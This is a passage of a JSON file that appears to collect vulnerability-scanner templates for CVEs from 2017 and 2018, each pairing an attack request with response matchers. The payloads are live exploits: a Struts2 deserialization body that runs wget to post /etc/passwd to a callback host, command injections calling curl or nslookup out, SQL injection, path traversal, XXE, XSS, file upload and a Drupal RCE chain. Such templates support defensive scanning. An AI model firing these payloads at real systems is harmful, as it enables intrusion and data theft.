*/*\n"],"payloads":{"endpoint":["admin","apply","non-CA-rev","cgitest","checkCookie","check_user","chn/liveView","cht/liveView","cnswebserver","config","configure/set_link_neg","configure/swports_adjust","eng/liveView","firmware","getCheckCode","get_status","getmac","getparam","guest/Login","home","htmlmgr","index","index/login","jscript","kvm","liveView","login","login.asp","login/login","login/login-page","login_mgr","luci","main","main-cgi","manage/login","menu","mlogin","netbinary","nobody/Captcha","nobody/VerifyCode","normal_userLogin","otgw","page","rulectl","service","set_new_config","sl_webviewer","ssi","status","sysconf","systemutil","t/out","top","unauth","upload","variable","wanstatu","webcm","webmain","webproc","webscr","webviewLogin","webviewLogin_m64","webviewer","welcome"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["environment variable","display library search paths"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-15287","info":{"name":"Dreambox WebControl 2.0.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["GET /webadmin/pkg?command=<script>alert(document.cookie)</script> HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n"],"matchers":[{"type":"word","words":["Unknown command: <script>alert(document.cookie)</script>"]}]}]},{"id":"CVE-2017-17736","info":{"name":"Kentico - Installer Privilege Escalation","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/CMSInstall/install.aspx"],"matchers-condition":"or","matchers":[{"type":"word","words":["Kentico","Database Setup","SQLServer"],"condition":"and"},{"type":"word","words":["Database Setup","SQLServer"],"condition":"and"}]}]},{"id":"CVE-2017-10075","info":{"name":"Oracle Content Server - Cross-Site Scripting","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>&dSecurityGroup=&QueryText=(dInDate+>=+%60<$dateCurrent(-7)$>%60)&PageTitle=OO","{{BaseURL}}/cs/idcplg?IdcService=GET_SEARCH_RESULTS&ResultTemplate=StandardResults&ResultCount=20&FromPageUrl=/cs/idcplg?IdcService=GET_DYNAMIC_PAGEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"&PageName=indext&SortField=dInDate&SortOrder=Desc&ResultsTitle=AAA&dSecurityGroup=&QueryText=(dInDate+%3E=+%60%3C$dateCurrent(-7)$%3E%60)&PageTitle=XXXXXXXXXXXX<svg/onload=alert(document.domain)>"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<svg/onload=alert(document.domain)>","ORACLE_QUERY"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-9805","info":{"name":"Apache Struts2 S2-052 - Remote Code Execution","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/struts2-rest-showcase/orders/3","{{BaseURL}}/orders/3"],"body":"<map>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString>\n      <flags>0</flags>\n      <value class=\"com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data\">\n        <dataHandler>\n          <dataSource class=\"com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource\">\n            <is class=\"javax.crypto.CipherInputStream\">\n              <cipher class=\"javax.crypto.NullCipher\">\n                <initialized>false</initialized>\n                <opmode>0</opmode>\n                <serviceIterator class=\"javax.imageio.spi.FilterIterator\">\n                  <iter class=\"javax.imageio.spi.FilterIterator\">\n                    <iter class=\"java.util.Collections$EmptyIterator\"/>\n                    <next class=\"java.lang.ProcessBuilder\">\n                      <command>\n                        <string>wget</string>\n                        <string>--post-file</string>\n                        <string>/etc/passwd</string>\n              <string>{{interactsh-url}}</string>\n                      </command>\n                      <redirectErrorStream>false</redirectErrorStream>\n                    </next>\n                  </iter>\n                  <filter class=\"javax.imageio.ImageIO$ContainsFilter\">\n                    <method>\n                      <class>java.lang.ProcessBuilder</class>\n                      <name>start</name>\n                      <parameter-types/>\n                    </method>\n                    <name>asdasd</name>\n                  </filter>\n                  <next class=\"string\">asdasd</next>\n                </serviceIterator>\n                <lock/>\n              </cipher>\n              <input class=\"java.lang.ProcessBuilder$NullInputStream\"/>\n              <ibuffer></ibuffer>\n              <done>false</done>\n              <ostart>0</ostart>\n              <ofinish>0</ofinish>\n              <closed>false</closed>\n            </is>\n            <consumed>false</consumed>\n          </dataSource>\n          <transferFlavors/>\n        </dataHandler>\n        <dataLen>0</dataLen>\n      </value>\n    </jdk.nashorn.internal.objects.NativeString>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n  <entry>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n    <jdk.nashorn.internal.objects.NativeString reference=\"../../entry/jdk.nashorn.internal.objects.NativeString\"/>\n  </entry>\n</map>\n","headers":{"Content-Type":"application/xml"},"matchers-condition":"and","matchers":[{"type":"word","words":["Debugging information","com.thoughtworks.xstream.converters.collections.MapConverter"],"condition":"and"},{"type":"status","status":[500]}]}]},{"id":"CVE-2017-12637","info":{"name":"SAP NetWeaver Application Server Java 7.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/scheduler/ui/js/ffffffffbca41eb4/UIUtilJavaScriptJS?/.."],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["WEB-INF","META-INF"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18502","info":{"name":"Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Subscriber by\")"],"condition":"and"}]}]},{"id":"CVE-2017-18638","info":{"name":"Graphite <=1.1.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/composer/send_email?to={{rand_text_alpha(4)}}@{{rand_text_alpha(4)}}&url=http://{{interactsh-url}}"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2017-18536","info":{"name":"WordPress Stop User Enumeration <=1.3.7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?author=1%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["forbidden - number in author","</script><script>alert(document.domain)</script>"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-3528","info":{"name":"Oracle E-Business Suite 12.1.3/12.2.x - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/OA_HTML/cabo/jsps/a.jsp?_t=fredRC&configName=&redirect=%2f%5cinteract.sh"],"matchers":[{"type":"word","part":"body","words":["noresize src=\"/\\interact.sh?configName="]}]}]},{"id":"CVE-2017-14135","info":{"name":"OpenDreambox 2.0.0 - Remote Code Execution","severity":"critical"},"requests":[{"raw":["GET /webadmin/script?command=|%20nslookup%20{{interactsh-url}} HTTP/1.1\nHost: {{Hostname}}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["/bin/sh","/usr/script"],"condition":"and"},{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-7269","info":{"name":"Windows Server 2003 & IIS 6.0 - Remote Code Execution","severity":"critical"},"requests":[{"method":"OPTIONS","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["regex(\"<DAV:sql>\", dasl)","regex(\"[\\d]+(,\\s+[\\d]+)?\", dav)","regex(\".*?PROPFIND\", public)","regex(\".*?PROPFIND\", allow)"],"condition":"or"},{"type":"word","part":"header","words":["IIS/6.0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-8917","info":{"name":"Joomla! <3.7.1 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml(0x23,concat(1,md5({{num}})),1)"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2017-5982","info":{"name":"Kodi 17.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/image/image%3A%2F%2F%2e%2e%252fetc%252fpasswd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-18493","info":{"name":"Custom Admin Page by BestWebSoft < 0.1.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\nHost: {{Hostname}}\n","GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(header_2, \"text/html\")","contains(body_2, \"></script><script>alert(document.domain)</script>\\\">All</a></li>\")","contains(body_3, \"Custom Admin Page by\")"],"condition":"and"}]}]},{"id":"CVE-2017-5521","info":{"name":"NETGEAR Routers - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/passwordrecovered.cgi?id={{rand_base(5)}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["right\">Router\\s*Admin\\s*Username<","right\">Router\\s*Admin\\s*Password<"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-11586","info":{"name":"FineCMS <5.0.9 - Open Redirect","severity":"medium"},"requests":[{"raw":["POST /index.php?s=member&c=login&m=index HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nback=&data%5Busername%5D={{username}}&data%5Bpassword%5D={{password}}&data%5Bauto%5D=1\n","GET /index.php?c=weixin&m=sync&url=http://interact.sh HTTP/1.1\nHost: {{Hostname}}\n"],"matchers":[{"type":"regex","part":"header","regex":["Refresh:(.*)url=http:\\/\\/interact\\.sh"]}]}]},{"id":"CVE-2017-12544","info":{"name":"HPE System Management - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/gsearch.php.en?prod=';prompt`document.domain`;//"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["var prodName = '';prompt`document.domain`;//';"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2017-16877","info":{"name":"Nextjs <2.4.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/_next/../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-1207","info":{"name":"Dell iDRAC7/8 Devices - Remote Code Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/cgi-bin/login?LD_DEBUG=files"],"matchers":[{"type":"word","part":"response","words":["calling init: /lib/"]}]}]},{"id":"CVE-2018-13980","info":{"name":"Zeta Producer Desktop CMS <14.2.1 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/assets/php/filebrowser/filebrowser.main.php?file=../../../../../../../../../../etc/passwd&do=download"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16167","info":{"name":"LogonTracer <=1.2.0 - Remote Command Injection","severity":"critical"},"requests":[{"raw":["POST /upload HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlogtype=XML&timezone=1%3Bwget+http%3A%2F%2F{{interactsh-url}}%3B\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2018-9118","info":{"name":"WordPress 99 Robots WP Background Takeover Advertisements <=4.1.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD","DB_HOST","The base configurations of the WordPress"],"condition":"and"}]}]},{"id":"CVE-2018-7251","info":{"name":"Anchor CMS 0.12.3 - Error Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/anchor/errors.log"],"matchers":[{"type":"word","words":["\"date\":","\"message\":","\"trace\":["],"condition":"and"}]}]},{"id":"CVE-2018-19386","info":{"name":"SolarWinds Database Performance Analyzer 11.1.457 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/iwc/idcStateError.iwc?page=javascript%3aalert(document.domain)%2f%2f"],"matchers-condition":"and","matchers":[{"type":"word","words":["<a href=\"javascript:alert(document.domain)//"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-3810","info":{"name":"Oturia WordPress Smart Google Code Inserter <3.5 - Authentication Bypass","severity":"critical"},"requests":[{"method":"POST","path":["{{BaseURL}}/wp-admin/options-general.php?page=smartcode"],"body":"sgcgoogleanalytic=<script>console.log(\"document.domain\")</script>&sgcwebtools=&button=Save+Changes&action=savegooglecode","headers":{"Content-Type":"application/x-www-form-urlencoded"}},{"method":"GET","path":["{{BaseURL}}"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["<script>console.log(\"document.domain\")</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8719","info":{"name":"WordPress WP Security Audit Log 3.1.1 - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/uploads/wp-security-audit-log/failed-logins/"],"matchers-condition":"and","matchers":[{"type":"word","words":["[TXT]",".log","Index of"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18809","info":{"name":"TIBCO JasperReports Library - Directory Traversal","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/jasperserver-pro/reportresource/reportresource/?resource=net/sf/jasperreports/../../../../js.jdbc.properties"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["metadata.jdbc.driverClassName","metadata.hibernate.dialect"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-10818","info":{"name":"LG NAS Devices - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /system/sharedir.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&uid=10; curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n","POST /en/php/usb_sync.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n&act=sync&task_number=1;curl http://{{interactsh-url}} -H 'User-Agent: {{useragent}}'\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: {{useragent}}"]}]}]},{"id":"CVE-2018-9205","info":{"name":"Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16670","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/services/user/values.xml?var=STATUS"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["<values><variable><id>","Reader.STATUS"],"condition":"and"}]}]},{"id":"CVE-2018-19752","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /assets/add/registrar.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_registrar=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_url=test&new_api_registrar_id=0&new_notes=test\n","GET /assets/registrars.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":2,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-6200","info":{"name":"vBulletin - Open Redirect","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/redirector.php?url=https://interact.sh","{{BaseURL}}/redirector.php?do=nodelay&url=https://interact.sh"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<meta http-equiv=\"refresh\" content=\"0; URL=https://interact.sh\">"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16671","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/device-id"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["circontrol"]},{"type":"regex","part":"body","regex":["(19|20)\\d\\d[- /.](0[1-9]|1[012])[- /.](0[1-9]|[12][0-9]|3[01])"]}]}]},{"id":"CVE-2018-10942","info":{"name":"Prestashop AttributeWizardPro Module - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /modules/{{paths}}/file_upload.php  HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=ba1f796d0aa2482e9c51c81ae6087818\n\n--ba1f796d0aa2482e9c51c81ae6087818\nContent-Disposition: form-data; name=\"userfile\"; filename=\"{{filename}}.php\"\nContent-Type: multipart/form-data\n\n{{randstr}}\n--ba1f796d0aa2482e9c51c81ae6087818--\n","GET /modules/{{paths}}/file_uploads/{{file}}  HTTP/1.1\nHost: {{Hostname}}\n"],"payloads":{"paths":["attributewizardpro","1attributewizardpro","attributewizardpro.OLD","attributewizardpro_x"]},"stop-at-first-match":true,"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["{{filename}}"]},{"type":"word","part":"body_2","words":["{{randstr}}"]}],"extractors":[{"type":"regex","name":"file","part":"body_1","internal":true,"group":1,"regex":["(.*?)\\|\\|\\|\\|"]}]}]},{"id":"CVE-2018-2392","info":{"name":"SAP Internet Graphics Server (IGS) - XML External Entity Injection","severity":"high"},"requests":[{"raw":["POST /XMLCHART HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary={{randstr_1}}\n\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_2}}\"; filename=\"{{randstr_3}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <ChartData>\n      <Categories>\n        <Category>ALttP</Category>\n      </Categories>\n      <Series label=\"{{randstr_4}}\">\n        <Point>\n          <Value type=\"y\">12345</Value>\n        </Point>\n      </Series>\n    </ChartData>\n--{{randstr_1}}\nContent-Disposition: form-data; name=\"{{randstr_5}}\"; filename=\"{{randstr_6}}.xml\"\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n    <!DOCTYPE Extension [<!ENTITY xxe SYSTEM \"/etc/passwd\">]>\n    <SAPChartCustomizing version=\"1.1\">\n      <Elements>\n        <ChartElements>\n          <Title>\n            <Extension>&xxe;</Extension>\n          </Title>\n        </ChartElements>\n      </Elements>\n    </SAPChartCustomizing>\n--{{randstr_1}}--\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["Picture","Info","/output/"],"condition":"and"},{"type":"word","part":"body","words":["ImageMap","Errors"],"condition":"or"},{"type":"word","part":"header","words":["text/html","SAP Internet Graphics Server"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-18775","info":{"name":"Microstrategy Web 7 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/microstrategy7/Login.asp?Server=Server001&Project=Project001&Port=0&Uid=Uid001&Msg=%22%3E%3Cscript%3Ealert(/{{randstr}}/)%3B%3C%2Fscript%3E%3C"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(/{{randstr}}/);</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12634","info":{"name":"CirCarLife Scada <4.3 - System Log Exposure","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/log"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","words":["user.debug","user.info","EVSE"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15745","info":{"name":"Argus Surveillance DVR 4.0.0.0 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/WEBACCOUNT.CGI?OkBtn=++Ok++&RESULTPAGE=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2FWindows%2Fsystem.ini&USEREDIRECT=1&WEBACCOUNTID=&WEBACCOUNTPASSWORD="],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["for 16-bit app support","[drivers]"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-17254","info":{"name":"Joomla! JCK Editor SQL Injection","severity":"critical"},"requests":[{"raw":["GET /plugins/editors/jckeditor/plugins/jtreelink/dialogs/links.php?extension=menu&view=menu&parent=\"%20UNION%20SELECT%20NULL,NULL,CONCAT_WS(0x203a20,USER(),DATABASE(),VERSION(),md5({{num}})),NULL,NULL,NULL,NULL,NULL--%20aa HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}\n"],"matchers":[{"type":"word","part":"body","words":["{{md5(num)}}"]}]}]},{"id":"CVE-2018-10822","info":{"name":"D-Link Routers - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/uir//etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-19892","info":{"name":"DomainMOD 4.11.01 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_username={{username}}&new_password={{password}}\n","POST /admin/dw/add-server.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnew_name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&new_host=abc&new_protocol=https&new_port=2086&new_username=abc&new_api_token=255&new_hash=&new_notes=\n","GET /admin/dw/servers.php HTTP/1.1\nHost: {{Hostname}}\n"],"host-redirects":true,"max-redirects":3,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"><script>alert(document.domain)</script></a>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-15535","info":{"name":"Responsive FileManager <9.13.4 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/filemanager/ajax_calls.php?action=get_file&sub_action=preview&preview_mode=text&title=source&file=../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-5715","info":{"name":"SugarCRM 3.5.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?action=Login&module=Users&print=a&%22%2F%3E%3Cscript%3Ealert(1)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["&\"/><script>alert(1)</script>=&\"><< Back</a><br><br>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-16668","info":{"name":"CirCarLife <4.3 - Improper Authentication","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/html/repository"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["CirCarLife Scada"]},{"type":"word","part":"body","words":["** Platform sources **","** Application sources **"],"condition":"and"}]}]},{"id":"CVE-2018-7602","info":{"name":"Drupal - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /?q=user%2Flogin HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_login&name={{username}}&pass={{password}}&op=Log+in\n","GET /?q={{url_encode(\"{{userid}}\")}}%2Fcancel HTTP/1.1\nHost: {{Hostname}}\n","POST /?q={{url_encode(\"{{userid}}\")}}%2Fcancel&destination={{url_encode(\"{{userid}}\")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account\n","POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nform_build_id={{form_build_id}}\n"],"host-redirects":true,"max-redirects":2,"matchers":[{"type":"word","words":["CVE-2018-7602-POC"]}],"extractors":[{"type":"regex","name":"userid","group":1,"regex":["<meta about=\"([/a-z0-9]+)\" property=\"foaf"],"internal":true,"part":"body"},{"type":"regex","name":"form_token","group":1,"regex":["<input type=\"hidden\" name=\"form_token\" value=\"(.*)\" />"],"internal":true,"part":"body"},{"type":"regex","name":"form_build_id","group":1,"regex":["<input type=\"hidden\" name=\"form_build_id\" value=\"(.*)\" />"],"internal":true,"part":"body"}]}]},{"id":"CVE-2018-8727","info":{"name":"Mirasys DVMS Workstation <=5.12.6 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/.../.../.../.../.../.../.../.../.../windows/win.ini"],"matchers":[{"type":"word","part":"body","words":["bit app support","fonts","extensions"],"condition":"and"}]}]},{"id":"CVE-2018-20824","info":{"name":"Atlassian Jira WallboardServlet <7.13.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/servlet/Wallboard/?dashboardId=10000&dashboardId=10000&cyclePeriod=alert(document.domain)"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["(?mi)timeout:\\salert\\(document\\.domain\\)"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-14918","info":{"name":"LOYTEC LGATE-902 6.3.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/webui/file_guest?path=/var/www/documentation/../../../../../etc/passwd&flags=1152"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-8033","info":{"name":"Apache OFBiz 16.11.04 - XML Entity Injection","severity":"high"},"requests":[{"raw":["POST /webtools/control/xmlrpc HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\nAccept-Language: en\nContent-Type: application/xml\n\n<?xml version=\"1.0\"?><!DOCTYPE x [<!ENTITY disclose SYSTEM \"file://///etc/passwd\">]><methodCall><methodName>&disclose;</methodName></methodCall>\n"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-12909","info":{"name":"Webgrind <= 1.5 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?op=fileviewer&file=/etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","part":"body","regex":["root:.*:0:0:","webgrind"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2018-7422","info":{"name":"WordPress Site Editor <=1.1.1 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=../../../../../../../wp-config.php","{{BaseURL}}/wp-content/plugins/site-editor/editor/extensions/pagebuilder/includes/ajax_shortcode_pattern.php?ajax_path=/etc/passwd"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["DB_NAME","DB_PASSWORD"],"condition":"and"},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2018-2894","info":{"name":"Oracle 